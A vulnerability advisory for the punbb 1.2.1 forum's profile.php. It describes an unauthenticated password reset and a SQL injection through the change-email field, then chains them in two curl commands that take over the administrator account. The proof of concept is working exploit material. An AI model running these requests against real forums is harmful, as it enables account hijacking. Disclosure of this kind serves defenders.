advisory002.txt

`=======================================================  
Multiple vulnerabilities in punbb-1.2.1 profile.php  
=======================================================  
  
Description  
-----------  
  
A remote attacker without an account can set the password  
of any user on the system to NULL, effectivley shuting  
them out of the system.  
  
A user on the system can also inject an arbitrary  
SQL statement using the change email feature. This has  
occured because of a fault in the is_valid_email function  
which returns true for strings that are not even close to  
being a valid email.  
  
This also affects systems using the magic_quotes_gpc  
option in php.ini.  
  
By combining these two an attacker with an account on  
the forum can change the password for any user to anything  
he/she wants to, gaining full access to the administrator  
account.  
  
Proof of concept  
----------------  
  
Examples of the damage the DoS attack and arbitrary  
SQL statement attacks can do on their own has been  
omitted. This is a demonstration of their power when  
combined.  
  
Assumptions for this particular example:  
- There is a user on the system with id 3 that has  
username/password set to 'sha'/'passwd'.  
- The cookie is valid for sha on system  
- The system supports sha1.  
- The new password for the id 2 account is supposed to  
be 'newpass'.  
  
curl --cookie punbb_cookie=<valid cookie> --form form_sent=1 --form req_new_email="6c55803d6f1d7a177a0db3eb4b343b0d50f9c111' -- [email protected]" http://target/profile.php?action=change_email\&id=3  
  
This will push the sha1 encrypted password 'newpass'  
into every users activate_string field. All that needs  
to be done is pushing this field to the password field  
of any user we want using the other bug.  
  
curl http://target/profile.php?action=change_pass\&id=2\&key=  
  
Now the account with user id 2 has the password 'newpass' set.  
`